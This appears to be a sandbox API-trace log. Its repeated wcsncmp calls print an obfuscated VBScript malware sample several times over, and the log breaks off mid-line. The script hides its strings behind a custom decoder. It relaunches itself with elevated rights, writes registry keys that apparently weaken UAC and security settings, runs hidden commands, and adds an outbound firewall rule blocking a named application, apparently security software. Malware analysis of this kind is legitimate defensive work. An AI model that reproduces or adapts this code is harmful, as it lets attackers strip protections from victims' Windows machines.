_\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.312] wcsncmp (_String1="Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.312] wcsncmp (_String1="id(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.312] wcsncmp (_String1="d(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.312] wcsncmp (_String1="(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.312] wcsncmp (_String1="s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 